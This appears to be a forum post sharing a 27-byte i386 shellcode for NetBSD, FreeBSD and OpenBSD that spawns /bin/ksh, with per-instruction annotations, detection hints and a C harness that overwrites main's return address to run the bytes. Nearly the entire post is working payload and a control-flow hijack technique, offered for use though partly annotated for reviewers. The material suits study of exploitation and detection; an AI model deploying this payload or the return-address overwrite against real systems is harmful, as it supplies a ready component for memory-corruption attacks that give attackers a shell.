在看过一位大侠写的shellcode之后,终于写出了一个可以在NetBSD、FreeBSD和OpenBSD上运行的shellcode,在这里特别感谢董剑(tongjian@stuff.sina.com)和scz(scz@nsfocus.com)的帮助。

/*
 * BSD shellcode for NetBSD, FreeBSD, OpenBSD
 * execve /bin/ksh
 * by matthew
 * Apr 11 2003
 *
 * 27 bytes.
 *
 *    __@
 *  _ \<_
 * (_)/(_) matthew@arbornet.org
 *
 */

/*
 * i386 machine code for the payload described in the file header
 * (execve of /bin/ksh), written one instruction per string literal.
 *
 * Decoded from the bytes below:
 *   - arguments are passed on the stack with one extra slot on top,
 *     the syscall number goes in al, and the kernel is entered with
 *     int 0x80 (the BSD i386 convention the header targets);
 *   - 0x3b (59) is the execve syscall number on those systems;
 *   - no byte is 0x00, so strlen() on this array reports the full length.
 *
 * For reviewers and detection authors: the two push-immediate words
 * spelling "/bin" and "/ksh" followed by "cd 80" are the most recognisable
 * part of the sequence. The array is a writable data object, so the bytes
 * only run where writable data is also executable.
 */
char shellcode[] =
    "\x31\xc0"              /* xor  eax, eax    ; eax = 0 without a NUL byte   */
    "\x50"                  /* push eax         ; string terminator            */
    "\x68\x2f\x6b\x73\x68"  /* push "/ksh"                                     */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"      ; esp -> "/bin/ksh\0"          */
    "\x89\xe3"              /* mov  ebx, esp    ; ebx = path                   */
    "\x50"                  /* push eax         ; argv[1] = NULL               */
    "\x53"                  /* push ebx         ; argv[0] = path               */
    "\x89\xe1"              /* mov  ecx, esp    ; ecx = argv                   */
    "\x50"                  /* push eax         ; third argument: envp = NULL  */
    "\x51"                  /* push ecx         ; second argument: argv        */
    "\x53"                  /* push ebx         ; first argument: path         */
    "\x50"                  /* push eax         ; extra slot above the args    */
    "\xb0\x3b"              /* mov  al, 0x3b    ; syscall number 59            */
    "\xcd\x80";             /* int  0x80        ; enter the kernel             */

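/*
 * Test harness: prints a banner and the payload length, then overwrites a
 * stack slot so that returning from main transfers control to shellcode[].
 *
 * NOTE(review): no #include is visible in this listing, so printf() and
 * strlen() are implicitly declared; C99 and later compilers reject that.
 * <stdio.h> and <string.h> belong at the top of the file.
 *
 * Returns 0 nominally; if the overwrite below lands on the return address,
 * control never goes back to the C runtime.
 */
int
main()
{
    /* Never read as a value; it only provides a known stack address. */
    int iret;

    printf("BSD shellcode: execve /bin/ksh\n");
    printf("Author:  matthew (matthew@arbornet.org)\n");
    /* strlen() yields size_t; cast so the argument matches %d. */
    printf("Length: %d\n", (int)strlen(shellcode));

    /*
     * Stores the address of shellcode[] in the int-sized slot two ints
     * above iret.
     * NOTE(review): presumably that slot is main's saved return address in
     * a 32-bit x86 frame (iret, saved frame pointer, return address) --
     * confirm for the compiler in use. Stack-alignment padding, frame
     * pointer omission or a stack protector canary moves the slot, and the
     * (int) cast truncates the pointer on LP64 targets.
     * shellcode[] is a writable data object: where W^X / non-executable
     * data is enforced, the redirected return faults instead of running
     * the bytes.
     */
    (* ((int *)&iret + 2)) = (int)shellcode;

    return 0;
}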